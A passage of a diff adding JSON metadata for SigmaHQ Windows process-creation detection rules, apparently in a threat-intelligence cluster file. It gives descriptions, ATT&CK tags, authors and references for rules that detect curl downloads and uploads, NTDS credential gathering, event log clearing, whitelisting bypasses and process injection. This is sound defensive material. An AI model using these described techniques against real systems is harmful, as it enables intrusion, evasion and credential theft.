"proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "value": "Suspicious Parent of Csc.exe", + "meta": { + "refs": [ + 
"https://twitter.com/SBousseaden/status/1094924091256176641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" + ], + "creation_date": "2019/02/11", + "filename": "proc_creation_win_susp_csc.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse Visual Basic (VB) for execution", + "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", + "value": "Cscript Visual Basic Script Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "creation_date": "2022/01/02", + "filename": "proc_creation_win_susp_cscript_vbs.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)",
+ "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4",
+ "value": "Suspicious Csc.exe Source File Folder",
+ "meta": {
+ "refs": [
+ "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
+ "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
+ "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
+ "https://twitter.com/gN3mes1s/status/1206874118282448897",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027.004"
+ ],
+ "creation_date": "2019/08/24",
+ "filename": "proc_creation_win_susp_csc_folder.yml",
+ "author": "Florian Roth",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897",
+ "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)",
+ "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31",
+ "value": "CsExec Remote Execution Tool Usage",
+ "meta": {
+ "refs": [
+ "https://github.com/malcomvetter/CSExec",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1587.001",
+ "attack.execution",
+ "attack.t1569.002"
+ ],
+ "creation_date": "2022/08/22",
+ "filename": "proc_creation_win_susp_csexec.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ 
"logsource.product": "windows" + } + }, + { + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft \u201cRoslyn\u201d Community Technology Preview was named 'rcsi.exe'", + "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "value": "Suspicious Csi.exe Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1072", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/17", + "filename": "proc_creation_win_susp_csi.yml", + "author": "Konstantin Grishchenko, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate usage by software developers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "value": "Suspicious Curl Usage on Windows", + "meta": { + "refs": [ + "https://twitter.com/max_mal_/status/1542461200797163522", + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/07/03", + "filename": "proc_creation_win_susp_curl_download.yml", + "author": "Florian Roth, Nasreddine Bencherchali (updated)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "value": "Suspicious Curl File Upload", + "meta": { + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ], + "creation_date": "2020/07/03", + "filename": "proc_creation_win_susp_curl_fileupload.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.",
+ "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288",
+ "value": "Curl Start Combination",
+ "meta": {
+ "refs": [
+ "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1218",
+ "attack.command_and_control",
+ "attack.t1105"
+ ],
+ "creation_date": "2020/01/13",
+ "filename": "proc_creation_win_susp_curl_start_combo.yml",
+ "author": "Sreeman, Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Administrative scripts (installers)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a suspicious curl process start on Windows with set useragent options",
+ "uuid": "3286d37a-00fd-41c2-a624-a672dcd34e60",
+ "value": "Suspicious Curl Change User Agents",
+ "meta": {
+ "refs": [
+ "https://curl.se/docs/manpage.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1071.001"
+ ],
+ "creation_date": "2022/01/23",
+ "filename": "proc_creation_win_susp_curl_useragent.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Scripts created by developers and admins",
+ "Administrative activity"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious process injection using ZOHO's dctask64.exe",
+ "uuid": "6345b048-8441-43a7-9bed-541133633d7a",
+ "value": "ZOHO Dctask64 Process Injection",
+ "meta": {
+ "refs": [
+ 
"https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ], + "creation_date": "2020/01/28", + "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown yet" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line to remove and 'exe' or 'dll'", + "uuid": "204b17ae-4007-471b-917b-b917b315c5db", + "value": "Suspicious Del in CommandLine", + "meta": { + "refs": [ + "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2021/12/02", + "filename": "proc_creation_win_susp_del.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "value": "Suspicious Desktopimgdownldr Command", + "meta": { + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + 
"creation_date": "2020/07/03", + "filename": "proc_creation_win_susp_desktopimgdownldr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "uuid": "90d50722-0483-4065-8e35-57efaadd354d", + "value": "DevInit Lolbin Download", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1460815932402679809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_susp_devinit_lolbin.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The Devtoolslauncher.exe executes other binary", + "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "value": "Devtoolslauncher.exe Executes Specified Binary", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", + "https://twitter.com/_felamos/status/1179811992841797632", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2019/10/12", + "filename": "proc_creation_win_susp_devtoolslauncher.yml", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "level": "high", + "falsepositive": [ + "Legitimate use of devtoolslauncher.exe by legitimate user" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "value": "Suspicious DIR Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ], + "creation_date": "2021/12/13", + "filename": "proc_creation_win_susp_dir.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", + "value": "Direct Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command that is used to disable or delete Windows 
eventlog via logman Windows utility", + "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "value": "Disable or Delete Windows Eventlog", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1359039665232306183?s=21", + "https://ss64.com/nt/logman.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" + ], + "creation_date": "2021/02/11", + "filename": "proc_creation_win_susp_disable_eventlog.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "value": "Disabled IE Security Features", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/06/19", + "filename": "proc_creation_win_susp_disable_ie_features.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown, maybe some security software installer disables these features temporarily" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "value": "Raccine Uninstall", + "meta": { + "refs": [ + "https://github.com/Neo23x0/Raccine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/01/21", + "filename": "proc_creation_win_susp_disable_raccine.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate deinstallation by administrative staff" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "value": "Execution via Diskshadow.exe", + "meta": { + "refs": [ + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_susp_diskshadow.yml", + "author": "Ivan Dyachkov, oscd.community", + "level": "high", + "falsepositive": [ + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Ditsnap tool. 
Seems to be a tool for ransomware groups.", + "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", + "value": "DIT Snapshot Viewer Use", + "meta": { + "refs": [ + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/yosqueoy/ditsnap", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2020/07/04", + "filename": "proc_creation_win_susp_ditsnap.yml", + "author": "Furkan Caliskan (@caliskanfurkan_)", + "level": "high", + "falsepositive": [ + "Legitimate admin usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", + "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "value": "Dllhost Process With No CommandLine", + "meta": { + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2022/06/27", + "filename": "proc_creation_win_susp_dllhost_no_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute C# code located in the consoleapp folder", + "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "value": "Application Whitelisting Bypass via Dnx.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + 
"https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_dnx.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use of dnx.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "value": "Suspicious Double Extension", + "meta": { + "refs": [ + "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2019/06/26", + "filename": "proc_creation_win_susp_double_extension.yml", + "author": "Florian Roth (rule), @blu3_team (idea)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "value": "Suspicious Download from Office Domain", + "meta": { + "refs": [ + "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", + "https://twitter.com/mrd0x/status/1475085452784844803?s=12", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/27", + "filename": "proc_creation_win_susp_download_office_domain.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "value": "Suspicious Kernel Dump Using Dtrace", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1474899714290208777?s=12", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/28", + "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "value": "Suspicious Electron Application Child Processes", + "meta": { + "refs": [ + "https://taggart-tech.com/quasar-electron/", + "https://github.com/mttaggart/quasar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" + ], + "tags": [ + 
"attack.execution" + ], + "creation_date": "2022/10/21", + "filename": "proc_creation_win_susp_electron_app_children.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "value": "Emotet RunDLL32 Process Creation", + "meta": { + "refs": [ + "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", + "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/12/25", + "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", + "author": "FPT.EagleEye", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "value": "Esentutl Gather Credentials", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816", + "https://attack.mitre.org/software/S0404/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" + ], + "creation_date": "2021/08/06", + "filename": "proc_creation_win_susp_esentutl_params.yml", + "author": "sam0x90", + "level": "medium", + "falsepositive": [ + "To be determined" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ], + "creation_date": "2019/09/26", + "filename": "proc_creation_win_susp_eventlog_clear.yml", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious execution from an uncommon folder", + "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "value": "Execution from Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_execution_path.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", + "value": "Execution in Webserver Root Folder", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_execution_path_webserver.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Various applications", + "Tools that include ping or nslookup command invocations" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attackers can use 
explorer.exe for evading defense mechanisms", + "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", + "value": "Proxy Execution Via Explorer.exe", + "meta": { + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_susp_explorer.yml", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "level": "low", + "falsepositive": [ + "Legitimate explorer.exe run from cmd.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "value": "Explorer Process Tree Break", + "meta": { + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/nas_bench/status/1535322450858233858", + "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2019/06/29", + "filename": "proc_creation_win_susp_explorer_break_proctree.yml", + "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", + "level": "medium", + "falsepositive": [ + "Unknown how many legitimate software products use that method" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": 
